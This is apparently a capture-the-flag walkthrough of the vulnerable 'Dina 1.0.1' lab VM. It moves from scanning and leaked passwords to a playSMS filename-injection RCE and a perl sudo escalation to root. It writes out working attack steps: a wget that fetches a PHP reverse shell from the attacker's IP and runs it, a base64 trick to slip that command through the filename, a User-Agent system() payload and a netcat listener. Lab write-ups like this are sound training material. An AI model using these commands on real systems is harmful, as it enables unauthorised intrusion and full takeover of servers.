- VM: Dina 1.0.1
- Goal: acquire root access
- Approach: solve without automated exploitation tools
First locate the IP address of my target:
nmap -n -sn 192.168.172.200-
nmap -P- -A 192.168.172.234
|Apache 2.2.22 (Ubuntu)
Let’s look at the website.
There’s a few folders found by nmap. Then only one that has something interesting is at /nothing/ folder.
There isn’t anything on this page. But if you look at the source of the page:
There’s some passwords in the comment:
Good start. But we need to find some places to use them. There isn’t other webpages to check. Let’s do a folder scan to see if we can find some hidden files or folders.
Directory scan using gobuster
gobuster -u http://192.168.172.234:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"
It finds a folder /secure
Navigate to the /secure folder shows a backup.zip file. Sounds like something of importance.
I download the file, uncompress it using 7z. Password is required. Try out the password list reveals that password freedom can unlock the zip file.
There is only one file called backup-cred.mp3. But it’s actually a text file, not mp3 file. Let’s check out what’s inside.
The file reveals a user name touhid and a hidden folder /SecreTSMSgatwayLogin. Looks like we hit something good. Let’s browse the hidden folder.
It brings us to the login page of a open source SMS management software called playSMS. Try logging in using username touhid and the list password. I am able to get in with the password diana. That list of passwords proofs to be very useful. 🙂
After browsing through some pages to get a general idea of the software, I use searchsploit to look for any vulnerability of the software.
There’s a sendfromfile.php Remote Code Execution exploit available for Metasploit. I copy the file to check it out.
searchsploit -m 44599.rb
Based on the exploit description, the Send from file feature allows us to upload files and if we use some php script as the filename, the script will be executed. Awesome, sounds like what we need to get our foot in.
So I use a simple script that output a text ‘Hello’ to test the vulnerability.
touch "<?php print 'Hello' ?>.php"
Now go to My account > Send from file to upload the file
Select the file and click UPLOAD FILE:
Awesome, it shows Hello instead of php script. That means the script is executed.
Time to get a reverse shell. I have tried a few simple 1 line reverse shell (bash, netcat & etc) but all didn’t work. So I decide to use a full php reverse shell. There’s already one available in kali. So I make a copy and name it shell4000.php. You would need to edit the file to use your attack machine’s IP address and a port. In my case, my kali box IP is 192.168.172.110 and I use port 4000.
cp /usr/share/webshells/php/php-reverse-shell.php shell4000.php
Then update the ip address and port #
$ip = '192.168.172.110'; // CHANGE THIS $port = 4000; // CHANGE THIS
Now we need to upload the reverse shell and then execute it by running the following commands:
wget http://192.168.172.110/shell4000.php -O /tmp/shell4000.php php -f /tmp/shell4000.php
However, there is one issue because we have to put the script as filename. Some characters such as ‘/‘ is not allowed. We have couple options to bypass this character limitation:
- Utilize HTTP header User agent
<?php system($_SERVER('HTTP_USER_AGENT')) ?>
Instead of placing full script in the filename, we use HTTP_USER_AGENT header to store the actual php script. This option would require use of proxy server such as Burp.
We can encode the script as filename and decode it during execution. A simple base64 encoding will do the trick.
.I am going to use base64 encoding to bypass this limitation.
As seen in the above image, I first obtain the base64 version of the command. Then use it in the filename and pipe it to base64 decode before execution.
Good. We have the 2 files ready. Now setup a webserver to serve the shell file.
python -m SimpleHTTPServer 80
Next setup netcat to listen to port 4000
nc -nvlp 4000
Now, it’s time to use Send from file feature to upload the 2 files one by one to receive our shell.
After uploading the first file, we see a request to get the file shell4000.php at our webserver. Good
Low shell obtained after we upload the 2nd file.
The very first command I like to do after getting a shell is sudo -l. If the user has some sudo capabilities, it’s the most easy way of getting root access.
Yup, the user is allowed to run perl. That also means that we can execute command as root. All we need is to use perl to run a bash shell as root.
Root shell obtained. All right!